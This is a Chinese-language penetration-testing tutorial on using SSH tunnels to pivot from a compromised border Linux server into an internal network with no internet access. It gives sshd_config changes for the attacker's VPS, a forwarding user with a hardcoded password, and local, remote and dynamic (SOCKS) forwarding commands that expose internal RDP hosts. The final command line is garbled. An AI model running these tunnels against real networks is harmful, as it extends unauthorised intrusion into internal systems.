内网端口转发[SSH]

一.应用场景

获取到目标边界机器linux服务器一台，想继而向内网其他机器渗透，获取到一台webshell发现处于内网当中且不通外网。可以通过linux ssh隧道对目标内网机器进行访问。

二.利用手法

ssh命令介绍：

-C  压缩传输数据,加快传输速度

-f  后台对用户名密码进行认证

-N  仅仅只用来转发,不用再弹回一个新的shell

-n  后台运行

-q  安静模式,不要显示警告等信息

-l  指定ssh登录名

-g  允许远程主机连接到本地转发的端口

-L  进行本地端口转发

-R  进行远程端口转发

-D  动态转发,即socks代理

-T  禁止分配伪终端

-p  指定远程ssh服务端口

需要对自己外网VPS SSH配置文件进行修改：/etc/ssh/sshd_config修改完成需重启SSH服务

PermitRootLogin yes  允许root远程登陆

AllowTcpForwarding yes

GatewayPorts yes

TCPKeepAlive yes  保持心跳,防止ssh断开

PasswordAuthentication yes

ServerAliveInterval=20

ServerAliveCountMax=8

/etc/init.d/sshd restart

创建建立转发用户

# useradd -s /sbin/nologin testtest

# echo "admin123123" | passwd --stdin testtest

边界机执行：本地端口转发：

ssh -C -f -N -g -L 边界机器linux:1231(任意端口):目标内网IP不出网:3389 testtest@外网VPS -p 22 本地转发

mstsc 边界机器:1231

边界机执行：远程端口转发：

把来自外部的 2222 端口流量全部转到目标端口3389端口

ssh -C -f -N -g -R 0.0.0.0:2222:目标内网机器:3389 root@外网VPS -p 22

mstsc 外网VPS:2222

三.ssh简单实现动态端口转发

ssh -qTfnN -D 0.0.0.0:1080 root@外网VPS -p 22

做好上面的转发之后,再回到外网vps（windows）这台机器上,利用putty通过动态端口的方式连到边界机

意思就是通过边界机将外网vps（linux）机器的1080端口和vps（windows）的1235端口进行绑定,即建立socks

这样当访问vps（windows）的1235端口就相当于访问边界机所在的整个目标内网段

 

ssh-qTfnN-D.0.0.0:1080root